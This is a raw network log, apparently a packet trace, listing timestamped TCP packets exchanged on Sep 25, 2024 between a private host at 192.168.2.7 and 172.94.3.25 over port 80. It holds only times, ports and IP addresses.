Sep 25, 2024 18:33:52.677203894 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.677937031 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.677953005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.677967072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.677972078 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.677983999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.678003073 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.678745985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.678761959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.678776026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.678792000 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.678802967 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.678806067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.678829908 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.678843975 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.679541111 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.679558039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.679572105 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.679589033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.679605007 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.679632902 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.680335999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.680355072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.680370092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.680385113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.680392027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.680424929 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.681152105 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.681166887 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.681180954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.681195974 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.681220055 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.681231022 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.681961060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.681974888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.681988001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.682003021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.682005882 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.682018042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.682029963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.682058096 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.682740927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.682756901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.682771921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.682787895 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.682806969 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.682826042 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.683542013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.683557034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.683572054 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.683579922 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.683593988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.683635950 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.684258938 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.684273958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.684287071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.684303045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.684303045 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.684317112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.684334040 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.684354067 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.686005116 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.688613892 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688631058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688692093 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.688714027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688729048 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688765049 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688780069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688796997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688797951 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.688805103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688812017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688818932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688827038 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688858986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688864946 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.688874006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688888073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688901901 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.688901901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688915968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688930035 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.688935041 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.688955069 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.689332962 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.689373970 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.689471960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.689487934 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.689651966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.689666986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.689687014 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.689716101 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.690546036 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.690563917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.690612078 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.691596031 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.760550022 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761009932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761045933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761081934 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761085033 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.761113882 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761136055 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.761148930 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761193037 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.761450052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761502028 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761535883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761567116 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.761569023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761607885 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761611938 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.761641026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761672974 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761682034 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.761707067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761739969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761764050 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.761790037 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761838913 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.761845112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.761981010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762013912 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762046099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762058020 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.762080908 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762089014 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.762120962 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762166977 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.762813091 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762847900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762881041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762890100 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.762917995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762954950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.762988091 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.763793945 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.763828993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.763859987 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.763860941 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.763899088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.763911963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.763932943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.763966084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.763999939 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.764791965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.764826059 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.764839888 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.764858961 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.764895916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.764914989 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.764929056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.764961004 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.764998913 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.765801907 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.765836000 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.765863895 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.765868902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.765903950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.765916109 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.765938997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.765983105 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.766794920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.766832113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.766861916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.766890049 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.766896963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.766930103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.766951084 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.766963005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.766994953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.767011881 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.767024040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.767077923 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.767750025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.767784119 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.767816067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.767833948 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.767849922 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.767888069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.767889977 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.768723965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.768773079 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.768776894 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.768810987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.768845081 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.768877029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.768879890 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.768908978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.768951893 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.769547939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.769581079 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.769613028 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.769617081 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.769644976 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.769678116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.769690990 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.769711018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.769721985 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.769745111 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.769789934 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.770500898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.770534992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.770566940 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.770586967 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.770600080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.770631075 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.770642996 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.770668983 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.770700932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.770719051 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.771473885 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.771522045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.771553993 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.771553993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.771590948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.771595001 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.771622896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.771656990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.771688938 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.771703959 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.771727085 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.772389889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.772424936 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.772456884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.772489071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.772521973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.772531986 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.772531986 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.772558928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.772619009 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.772619009 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.773380995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.773420095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.773452044 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.773484945 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.773515940 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.773535013 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.773535013 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.773549080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.773580074 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.773632050 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.774301052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.774334908 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.774367094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.774404049 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.774408102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.774408102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.774435997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.774468899 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.774502039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.774533987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.774548054 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.774548054 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.775253057 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.775285959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.775319099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.775341988 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.775357008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.775401115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.775438070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.775471926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.775504112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.775511980 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.775588036 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.776119947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.793339968 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.804008961 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.850235939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.850358963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.850373983 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.850394964 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.850615978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.850630999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.850645065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.850677967 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.850684881 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.850745916 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.851239920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.851254940 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.851269960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.851284981 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.851300955 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.851313114 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.851315975 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.851330042 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.851380110 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.852221966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.852236032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.852250099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.852266073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.852281094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.852281094 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.852281094 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.852296114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.852309942 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.852338076 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.852338076 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.853179932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.853194952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.853209019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.853221893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.853230000 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.853235960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.853250980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.853266001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.853267908 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.853337049 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.854137897 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.854152918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.854166031 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.854171991 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.854180098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.854195118 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.854202032 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.854208946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.854223967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.854235888 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.854284048 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.855041027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.855055094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.855108023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.855120897 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.855123997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.855139017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.855153084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.855165958 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.855169058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.855242968 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.856062889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.856077909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.856092930 CEST	80	49699	172.94.3.25	192.168.2.7
